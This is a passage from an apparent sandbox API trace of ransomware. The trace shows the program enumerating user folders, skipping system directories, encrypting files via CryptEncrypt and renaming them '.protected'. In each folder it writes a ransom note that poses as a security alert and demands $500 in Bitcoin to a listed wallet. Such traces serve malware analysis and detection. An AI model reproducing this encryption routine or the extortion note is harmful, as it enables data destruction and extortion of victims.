(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.228] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.228] lstrcmpiW (lpString1="imagesrv.adition[1].xml", lpString2="Windows") returned -1 [0089.228] lstrcmpiW (lpString1="imagesrv.adition[1].xml", lpString2="Program Files") returned -1 [0089.228] lstrcmpiW (lpString1="imagesrv.adition[1].xml", lpString2="Program Files (x86)") returned -1 [0089.228] lstrcmpiW (lpString1="imagesrv.adition[1].xml", lpString2="$Recycle.bin") returned 1 [0089.228] lstrcmpiW (lpString1="imagesrv.adition[1].xml", lpString2="System Volume Information") returned -1 [0089.228] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned 120 [0089.228] StrStrIW (lpFirst="imagesrv.adition[1].xml", lpSrch=".protected") returned 0x0 [0089.228] lstrcmpW (lpString1="imagesrv.adition[1].xml", lpString2="RESTORE_FILES.txt") returned -1 [0089.228] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.228] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned 120 [0089.229] StrStrW (lpFirst="imagesrv.adition[1].xml", lpSrch=".txt") returned 0x0 [0089.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned 120 [0089.229] StrStrW (lpFirst="imagesrv.adition[1].xml", lpSrch=".rar") returned 0x0 [0089.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned 120 [0089.229] StrStrW (lpFirst="imagesrv.adition[1].xml", lpSrch=".zip") returned 0x0 [0089.229] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0089.230] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffff3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.230] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0089.230] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.230] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.230] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.230] CloseHandle (hObject=0x154) returned 1 [0089.231] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.protected") returned 130 [0089.231] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.protected")) returned 1 [0089.231] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.231] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.231] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\RESTORE_FILES.txt") returned 114 [0089.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.232] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.232] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.233] lstrlenA (lpString="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") returned 684 [0089.233] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, 
lpOverlapped=0x0) returned 1 [0089.233] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.233] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.233] CloseHandle (hObject=0x150) returned 1 [0089.233] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.233] lstrcmpiW (lpString1="3O75JDME", lpString2="Windows") returned -1 [0089.233] lstrcmpiW (lpString1="3O75JDME", lpString2="Program Files") returned -1 [0089.233] lstrcmpiW (lpString1="3O75JDME", lpString2="Program Files (x86)") returned -1 [0089.233] lstrcmpiW (lpString1="3O75JDME", lpString2="$Recycle.bin") returned 1 [0089.233] lstrcmpiW (lpString1="3O75JDME", lpString2="System Volume Information") returned -1 [0089.233] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME") returned 96 [0089.233] lstrcmpW (lpString1="3O75JDME", lpString2=".") returned 1 [0089.234] lstrcmpW (lpString1="3O75JDME", lpString2="..") returned 1 [0089.234] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*") returned 98 [0089.234] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.234] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.234] lstrcmpiW (lpString1=".", 
lpString2="Program Files") returned -1 [0089.234] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.234] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.234] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.234] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\.") returned 98 [0089.234] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.234] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.234] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.234] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.234] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.235] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.235] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.235] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.235] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.235] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.235] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.235] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\..") returned 99 [0089.235] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.235] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.235] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.235] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.235] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.235] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.235] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.235] lstrcmpiW (lpString1="www.google[1].xml", lpString2="Windows") returned 1 [0089.235] lstrcmpiW (lpString1="www.google[1].xml", lpString2="Program Files") returned 1 [0089.235] lstrcmpiW (lpString1="www.google[1].xml", lpString2="Program Files (x86)") returned 1 [0089.235] lstrcmpiW (lpString1="www.google[1].xml", lpString2="$Recycle.bin") returned 1 [0089.235] lstrcmpiW (lpString1="www.google[1].xml", lpString2="System Volume Information") returned 1 [0089.235] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned 114 [0089.235] StrStrIW (lpFirst="www.google[1].xml", lpSrch=".protected") returned 0x0 [0089.235] lstrcmpW (lpString1="www.google[1].xml", lpString2="RESTORE_FILES.txt") returned 1 [0089.235] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.235] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned 114 [0089.236] StrStrW (lpFirst="www.google[1].xml", lpSrch=".txt") returned 0x0 [0089.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned 114 [0089.236] StrStrW (lpFirst="www.google[1].xml", lpSrch=".rar") returned 0x0 [0089.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned 114 [0089.236] StrStrW (lpFirst="www.google[1].xml", lpSrch=".zip") returned 0x0 [0089.236] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0089.237] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffff3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.237] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0089.237] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.237] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.237] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.237] CloseHandle (hObject=0x154) returned 1 [0089.237] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.protected") returned 124 [0089.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.protected")) returned 1 [0089.239] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.239] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.239] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\RESTORE_FILES.txt") returned 114 [0089.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.240] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.240] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.240] lstrlenA (lpString="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") returned 684 [0089.240] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0089.240] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.241] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.241] CloseHandle (hObject=0x150) returned 1 [0089.241] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.241] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0089.241] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0089.241] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0089.241] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0089.241] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0089.241] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 97 [0089.241] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0089.241] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0089.241] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.241] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet 
explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 97 [0089.241] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0089.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 97 [0089.241] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0089.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 97 [0089.241] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0089.241] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.263] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.263] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.263] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.263] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.263] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, 
lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.263] CloseHandle (hObject=0x150) returned 1 [0089.264] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.protected") returned 107 [0089.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.protected")) returned 1 [0089.264] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.264] lstrcmpiW (lpString1="UV0DUWVB", lpString2="Windows") returned -1 [0089.264] lstrcmpiW (lpString1="UV0DUWVB", lpString2="Program Files") returned 1 [0089.264] lstrcmpiW (lpString1="UV0DUWVB", lpString2="Program Files (x86)") returned 1 [0089.264] lstrcmpiW (lpString1="UV0DUWVB", 